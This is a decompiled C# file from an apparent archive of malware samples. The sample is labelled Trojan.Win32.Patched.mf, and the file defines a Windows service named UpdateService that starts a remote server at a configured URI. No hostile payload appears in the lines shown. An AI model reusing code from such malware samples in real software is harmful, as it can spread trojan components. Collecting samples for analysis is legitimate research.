MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f/Services/Update/UpdateService.cs
2022-08-18 06:28:56 -05:00

24 lines
850 B
C#

// Decompiled with JetBrains decompiler
// Type: Bmc.Services.Update.UpdateService
// Assembly: updateservice, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A6A1FC23-14F7-4CCE-B702-0F9FFD2CD5AC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-9c4f7eb57e580673b883e57f31931bcbce8bd5d8de1a509a25b8b5a175335d9f.exe
using Bmc.RegistryAccess;
using System.ServiceProcess;
namespace Bmc.Services.Update
{
internal class UpdateService : RemoteServiceBase
{
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new UpdateService()
});
public UpdateService() => this.ServiceName = Constants.SERVICE_NAME;
protected override void OnStart(string[] args) => this.OnStart((FIELD) 7, Constants.URI, typeof (UpdateServer));
}
}